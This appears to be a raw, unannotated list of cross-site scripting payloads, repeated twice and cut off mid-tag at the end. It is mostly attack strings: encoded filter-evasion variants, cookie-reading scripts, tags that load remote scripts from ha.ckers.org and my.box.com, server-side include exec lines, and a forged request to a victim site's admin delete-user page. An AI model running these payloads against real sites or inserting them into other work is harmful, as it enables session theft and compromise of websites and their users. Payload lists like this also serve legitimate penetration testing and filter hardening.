alert(123); alert(“XSS”); alert(123) alert(“hellox worldss”); alert(“XSS”)  alert(“XSS”); alert(‘XSS’) “>alert(“XSS”) alert(/XSS”) alert(/XSS/) alert(1) ‘; alert(1); ‘)alert(1);// alert(1)                {font-family&colon;”  <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"  alert&lpar;1&rpar; {Opera}  <img/src=`%00` onerror=this.onerror=confirm(1)  <isindex formaction="javascript&colon;confirm(1)"  <img src=`%00`&NewLine; onerror=alert(1)&NewLine;    prompt(1)</ScRipT giveanswerhere=?    /*%00*/alert(1)/*%00*/</script /*%00*/  ">%00  <iframe/src="data:text/html,”>    </script  <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}     <a href=X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. 
\u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) alert(“XSS”)”> <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") “>’>alert(String.fromCharCode(88,83,83)) ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> <alert(“XSS”);//< “>’>alert(String.fromCharCode(88,83,83)) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search alert(“hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 alert(“XSS”);&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–>”>’>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search hellox worldss … lol <!– <img src=" alert(1)”> alert(1)”> alert(1)”> alert(1)’>”> alert(1)”> alert(123)”> LOL LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;} ({0:#0=alert/#0#/#0#(0)}) LOLalert(123) 
<SCRIPT>alert(/XSS/.source)</SCRIPT> \\”;alert(‘XSS’);// </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT> <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”> <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=\”javascript:alert(‘XSS’)\”> <IMG LOWSRC=\”javascript:alert(‘XSS’)\”> <BGSOUND SRC=\”javascript:alert(‘XSS’);\”> <BR SIZE=\”\”> <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER> <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”> <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”> <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”> <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE> <XSS STYLE=\”behavior: url(xss.htc);\”> <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS <IMG SRC=’vbscript:msgbox(\”XSS\”)’> <IMG SRC=\”mocha:[code]\”> <IMG SRC=\”livescript:[code]\”> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\” <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME> <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET> <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”> <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”width: expression(alert(‘XSS’));\”> <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)';</STYLE> <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”> <XSS STYLE=\”xss:expression(alert(‘XSS’))\”> exp/*<A STYLE=’no\xss:noxss(\”*//*\”); 
xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’> <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE> <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A> <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE> <!–[if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif]–> <BASE HREF=\”javascript:alert(‘XSS’);//\”> <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT> <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED> <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED> a=\”get\”; b=\”URL(\\”\”; c=\”javascript:\”; d=\”alert(‘XSS’);\\”)\”; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\”xss\”><I><B><IMG SRC=\”javas<!– –>cript:alert(‘XSS’)\”></B></I></XML> <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN> <XML SRC=\”xsstest.xml\” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”> <?import namespace=\”t\” implementation=\”#default#time2\”> <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”> </BODY></HTML> <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT> <!–#exec cmd=\”/bin/echo 
‘<SCR’\”–><!–#exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\”–> <? echo(‘<SCR)'; echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?> <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”> <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>\” ” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <A HREF=\”http://66.102.7.147/\”>XSS</A> <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A> <A HREF=\”http://1113982867/\”>XSS</A> <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A> <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A> <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A> <A HREF=\”//www.google.com/\”>XSS</A> <A HREF=\”//google\”>XSS</A> <A HREF=\”http://ha.ckers.org@google\”>XSS</A> <A HREF=\”http://google:ha.ckers.org\”>XSS</A> <A HREF=\”http://google.com/\”>XSS</A> <A HREF=\”http://www.google.com./\”>XSS</A> <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A> <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A> < %3C &lt < &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < < &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c < < < < < < &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < < &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C < < < < < < \x3c \x3C \u003c \u003C 
<iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\”javascript:alert(‘XSS’)\” <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\”XSS\”);//<</SCRIPT> <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)> <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <IMG SRC=\” javascript:alert(‘XSS’);\”> perl -e ‘print \”<SCRIPT>alert(\\”XSS\\”)</SCRIPT>\”;’ > out perl -e ‘print \”<IMG SRC=javascript:alert(\\”XSS\\”)>\”;’ > out <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”> <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=\”javascript:alert(‘XSS’);\”> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ”;!–\”<XSS>=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= alert(“XSS”)”> <alert(“XSS”);//< a=/XSS/alert(a.source) \”;alert(‘XSS’);// alert(“XSS”); ¼script¾alert(¢XSS¢)¼/script¾ @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* 
a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e); document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> TESTHTML5FORMACTION crosssitespt <!– <img src=" alert(1)”> alert(1)”> alert(1)”> ({0:#0=alert/#0#/#0#(123)}) ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)() {alert(1)};1 crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’) alert(1) +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))" title="alert(123); alert(“XSS”); alert(123) alert(“hellox worldss”); alert(“XSS”) alert(“XSS”); alert(‘XSS’) “>alert(“XSS”) alert(/XSS”) alert(/XSS/) alert(1) ‘; alert(1); ‘)alert(1);// alert(1) {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? 
/*%00*/alert(1)/*%00*/</script /*%00*/ ">%00 <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. 
\u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) alert(“XSS”)”> <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") “>’>alert(String.fromCharCode(88,83,83)) ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> <alert(“XSS”);//< “>’>alert(String.fromCharCode(88,83,83)) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search alert(“hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 alert(“XSS”);&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–>”>’>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search hellox worldss … lol <!– <img src=" alert(1)”> alert(1)”> alert(1)”> alert(1)’>”> alert(1)”> alert(123)”> LOL LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;} ({0:#0=alert/#0#/#0#(0)}) LOLalert(123) 
<SCRIPT>alert(/XSS/.source)</SCRIPT> \\”;alert(‘XSS’);// </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT> <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”> <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=\”javascript:alert(‘XSS’)\”> <IMG LOWSRC=\”javascript:alert(‘XSS’)\”> <BGSOUND SRC=\”javascript:alert(‘XSS’);\”> <BR SIZE=\”\”> <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER> <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”> <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”> <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”> <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE> <XSS STYLE=\”behavior: url(xss.htc);\”> <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS <IMG SRC=’vbscript:msgbox(\”XSS\”)’> <IMG SRC=\”mocha:[code]\”> <IMG SRC=\”livescript:[code]\”> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\” <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME> <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET> <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”> <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”width: expression(alert(‘XSS’));\”> <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)';</STYLE> <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”> <XSS STYLE=\”xss:expression(alert(‘XSS’))\”> exp/*<A STYLE=’no\xss:noxss(\”*//*\”); 
xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’> <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE> <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A> <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE> <!–[if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif]–> <BASE HREF=\”javascript:alert(‘XSS’);//\”> <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT> <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED> <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED> a=\”get\”; b=\”URL(\\”\”; c=\”javascript:\”; d=\”alert(‘XSS’);\\”)\”; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\”xss\”><I><B><IMG SRC=\”javas<!– –>cript:alert(‘XSS’)\”></B></I></XML> <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN> <XML SRC=\”xsstest.xml\” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”> <?import namespace=\”t\” implementation=\”#default#time2\”> <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”> </BODY></HTML> <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT> <!–#exec cmd=\”/bin/echo 
‘<SCR’\”–><!–#exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\”–> <? echo(‘<SCR)'; echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?> <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”> <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>\” ” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <A HREF=\”http://66.102.7.147/\”>XSS</A> <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A> <A HREF=\”http://1113982867/\”>XSS</A> <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A> <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A> <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A> <A HREF=\”//www.google.com/\”>XSS</A> <A HREF=\”//google\”>XSS</A> <A HREF=\”http://ha.ckers.org@google\”>XSS</A> <A HREF=\”http://google:ha.ckers.org\”>XSS</A> <A HREF=\”http://google.com/\”>XSS</A> <A HREF=\”http://www.google.com./\”>XSS</A> <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A> <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A> < %3C &lt < &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < < &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c < < < < < < &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < < &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C < < < < < < \x3c \x3C \u003c \u003C 
<iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\”javascript:alert(‘XSS’)\” <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\”XSS\”);//<</SCRIPT> <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)> <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <IMG SRC=\” javascript:alert(‘XSS’);\”> perl -e ‘print \”<SCRIPT>alert(\\”XSS\\”)</SCRIPT>\”;’ > out perl -e ‘print \”<IMG SRC=javascript:alert(\\”XSS\\”)>\”;’ > out <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=javascript:alert(‘XSS’)> <IMG 